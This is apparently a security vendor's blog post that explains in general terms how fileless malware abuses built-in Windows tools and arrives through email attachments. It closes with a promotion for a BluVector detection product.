Fileless Malware: If You’re Not Worried, You Should Be
While the message that “crime does not pay” was drilled into our heads in TV and movies… it seems that it this crime does.
The first computer “virus” can be traced back to 1971. Named “Creeper system,” it would infect the computer with the message “I’m the creeper, catch me if you can!” and would disable that workstation.
Over the years, the bad guys continue to hone their tools and the computer virus has paved the way for computer worms, ransomware, spyware, adware, trojan horses, keyloggers, rootkits and other malicious software. While each of have their own unique traits, they intent is the same — infecting a computer to do something “evil” on behalf of a threat actor.
As the cat-and-mouse game between security professionals and threat actors play out on a daily basis, a new threat is emerging that is keeping the good guys up at night. The threat of fileless malware is increasing and brings up a unique set of challenges that still thinks about how to combat file-based attacks.
Fileless malware describes a set of attacks that use the underlying operating system, usually Microsoft Windows, against itself. A typical end user barely scratches the surface of the capabilities built into the operating system. Under the hood of Windows are over 100 legitimate Windows system tools including PowerShell, Windows Management Instrumentation (WMI), .NET and Microsoft Office Macros that can be exploited in a fileless malware attack.
These tools do serve a purpose in the typical enterprise. PowerShell is used by system administrators to automate tasks; WMI is used to manage Windows workstations on a network; .NET is used for custom application development and Microsoft Office Macros can be used work magic in Microsoft Word, Excel or PowerPoint.
So, how can you protect against these types of attacks? Turning everything off isn’t possible. A typical enterprise would quickly grind to a halt (and it would be virtually technically impossible to do).
The first thing to keep in mind is that the most common attack vector for fileless malware attacks is delivery as an attachment to an email. Microsoft Office documents or PDF files are often used to deliver a payload with malicious intent. The payload will attempt to use one or more legitimate Windows tools to execute a script or macro and exploit that workstation. As they utilize legitimate Windows functions, they are hard to detect. So threat actors can hide in the shadows of what looks to be normal activity.
Existing, signature-based security can help with known threats, yet they’re challenged to protect against fileless malware attacks. The payload seems to be legitimate and will not raise any red flags. The key to protecting against fileless malware is to look beyond the payload’s contains, and instead understand what that payload is capable of.
While great efforts have been made to educate end users to recognize when an email doesn’t look right and enabling them with a mechanism to report it to the security team, it is only part of the solution. It only takes one user to open an attachment that they should not have to cause a problem.
This is where machine learning (ML) and artificial intelligence (AI) can play a large part in the defense of a network. ML and AI can analyze files and network traffic at line speeds and determine if that content has the potential to do something malicious. A Microsoft Excel spreadsheet with a macro that calculates commissions for a sales team is likely legitimate, but a spreadsheet that executes a Microsoft PowerShell command to download a piece of code is probably not.
A well-trained workforce is a key part of network defense, but it doesn’t scale. An effective defense needs to analyze traffic as it comes across the network and stop it before it makes it into users’ inboxes.
The good news is that the Speculative Code Execution in BluVector Advanced Threat Detection™ was created to help with the detection of fileless malware within an organization’s network environment. If you’re already a customer, you already have this capability.